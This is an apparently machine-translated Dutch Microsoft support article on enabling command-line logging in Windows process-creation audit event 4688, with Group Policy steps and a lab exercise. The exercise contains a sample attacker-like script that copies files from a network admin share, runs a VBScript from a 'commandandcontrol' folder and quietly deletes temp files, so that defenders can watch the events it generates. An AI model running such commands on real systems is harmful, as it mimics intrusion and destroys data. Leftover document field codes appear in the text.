Notitie
Voor toegang tot deze pagina is autorisatie vereist. U kunt proberen u aan te melden of de directory te wijzigen.
Voor toegang tot deze pagina is autorisatie vereist. U kunt proberen de mappen te wijzigen.
Auteur: Justin Turner, Senior Support Escalation Engineer bij het Windows-team
Opmerking
Deze inhoud wordt geschreven door een klantondersteuningstechnicus van Microsoft en is bedoeld voor ervaren beheerders en systeemarchitecten die op zoek zijn naar diepere technische uitleg van functies en oplossingen in Windows Server 2012 R2 dan onderwerpen op TechNet meestal bieden. Het heeft echter niet dezelfde bewerkingspassen ondergaan, dus sommige van de taal lijkt misschien minder professioneel dan wat doorgaans op TechNet wordt gevonden.
Overzicht
De controlegebeurtenis-id 4688 voor het creëren van een vooraf bestaand proces bevat nu auditinformatie voor opdrachtregelprocessen.
Ook wordt SHA1/2-hash van het uitvoerbare bestand in het Gebeurtenislogboek van AppLocker vastgelegd
- Toepassings- en serviceslogboeken\Microsoft\Windows\AppLocker
U schakelt dit in via groepsbeleidsobject, maar dit is standaard uitgeschakeld
- "Neem de opdrachtregel op in gebeurtenissen voor het maken van processen"
Afbeelding SEQ Afbeelding \* ARABISCH 16 Gebeurtenis 4688
Controleer de bijgewerkte gebeurtenis-id 4688 in REF _Ref366427278 \h Afbeelding 16. Vóór deze update worden er geen gegevens voor Process Command Line gelogd. Vanwege deze extra logboekregistratie kunnen we nu zien dat niet alleen het wscript.exe proces is gestart, maar dat het ook is gebruikt om een VB-script uit te voeren.
Configuratie
Als u de effecten van deze update wilt zien, moet u twee beleidsinstellingen inschakelen.
Om gebeurtenis-ID 4688 weer te geven, moet het auditproces voor het maken van processen ingeschakeld zijn.
Als u het beleid voor het maken van controleprocessen wilt inschakelen, bewerkt u het volgende groepsbeleid:
Beleidslocatie: Computerconfiguratiebeleid >> Windows-instellingen Beveiligingsinstellingen >> Geavanceerde controleconfiguratie > gedetailleerd bijhouden
Beleidsnaam: Auditprocescreatie
Ondersteund op: Windows 7 en hoger
Beschrijving/Help:
Deze beveiligingsbeleidsinstelling bepaalt of het besturingssysteem controlegebeurtenissen genereert wanneer een proces wordt gemaakt (wordt gestart) en de naam van het programma of de gebruiker die het heeft gemaakt.
Deze controlegebeurtenissen kunnen u helpen begrijpen hoe een computer wordt gebruikt en gebruikersactiviteiten bij te houden.
Gebeurtenisvolume: laag tot gemiddeld, afhankelijk van het systeemgebruik
Standaard: Niet geconfigureerd
Als u de toevoegingen aan gebeurtenis-id 4688 wilt zien, moet u de nieuwe beleidsinstelling inschakelen: Opdrachtregel opnemen in procesbewerkingen
Tabel SEQ Table \* ARABIC 19 beleidsinstelling voor opdrachtregelprocessen
| Beleidsconfiguratie | Bijzonderheden |
|---|---|
| Pad | Beheerssjablonen\Systeem\Auditprocessen maken |
| Omgeving | Opdrachtregel opnemen bij procescreatie |
| Standaardinstelling | Niet geconfigureerd (niet ingeschakeld) |
| Ondersteund op: | ? |
| Beschrijving | Deze beleidsinstelling bepaalt welke informatie wordt vastgelegd in beveiligingscontrolegebeurtenissen wanneer er een nieuw proces is gemaakt. Deze instelling is alleen van toepassing wanneer het beleid voor het maken van controleprocessen is ingeschakeld. Als u deze beleidsinstelling inschakelt, worden de opdrachtregelgegevens voor elk proces vastgelegd in tekst zonder opmaak in het gebeurtenislogboek van de beveiligingsgebeurtenis als onderdeel van de gebeurtenis Maken van controleproces 4688, 'er is een nieuw proces gemaakt', op de werkstations en servers waarop deze beleidsinstelling wordt toegepast. Als u deze beleidsinstelling uitschakelt of niet configureert, worden de opdrachtregelgegevens van het proces niet opgenomen in gebeurtenissen voor het maken van controleprocessen. Standaardinstelling: niet geconfigureerd Opmerking: wanneer deze beleidsinstelling is ingeschakeld, kan elke gebruiker met toegang tot het lezen van de beveiligings gebeurtenissen de opdrachtregelargumenten lezen voor elk proces dat is gemaakt. Opdrachtregelargumenten kunnen gevoelige of persoonlijke gegevens bevatten, zoals wachtwoorden of gebruikersgegevens. |
laat zien
Wanneer u geavanceerde controlebeleidconfiguratie-instellingen gebruikt, moet u controleren of deze instellingen niet worden overschreven door basisinstellingen voor controlebeleid. Gebeurtenis 4719 wordt geregistreerd wanneer de instellingen worden overschreven.
De volgende procedure laat zien hoe u conflicten kunt voorkomen door de toepassing van eventuele basisinstellingen voor controlebeleid te blokkeren.
Om ervoor te zorgen dat de configuratie-instellingen voor geavanceerd controlebeleid niet worden overschreven
De console Groepsbeleidsbeheer openen
Klik met de rechtermuisknop op Standaarddomeinbeleid en selecteer Bewerken.
Dubbelklik op Computerconfiguratie, dubbelklik op Beleid en dubbelklik vervolgens op Windows-instellingen.
Dubbelklik op Beveiligingsinstellingen, dubbelklik op Lokaal beleid en selecteer Vervolgens Beveiligingsopties.
Dubbelklik op Controle: subcategorieinstellingen voor controlebeleid afdwingen (Windows Vista of hoger) om de instellingen voor de categorie controlebeleid te overschrijven en selecteer vervolgens Deze beleidsinstelling definiëren.
Selecteer Ingeschakeld en selecteer vervolgens OK.
Aanvullende informatiebronnen
Stapsgewijze handleiding voor geavanceerd beveiligingscontrolebeleid
AppLocker: veelgestelde vragen
Probeer dit: Controle van opdrachtregelprocessen verkennen
Audit Process Creation-evenementen inschakelen en ervoor te zorgen dat de configuratie van het geavanceerde controlebeleid niet wordt overschreven
Maak een script dat enkele interessante gebeurtenissen genereert en het script uitvoert. Bekijk de gebeurtenissen. Het script dat wordt gebruikt om de gebeurtenis in de les te genereren, ziet er als volgt uit:
mkdir c:\systemfiles\temp\commandandcontrol\zone\fifthward copy \\192.168.1.254\c$\hidden c:\systemfiles\temp\hidden\commandandcontrol\zone\fifthward start C:\systemfiles\temp\hidden\commandandcontrol\zone\fifthward\ntuserrights.vbs del c:\systemfiles\temp\*.* /QDe controle van het commandoregelproces inschakelen
Hetzelfde script uitvoeren als voorheen en de gebeurtenissen observeren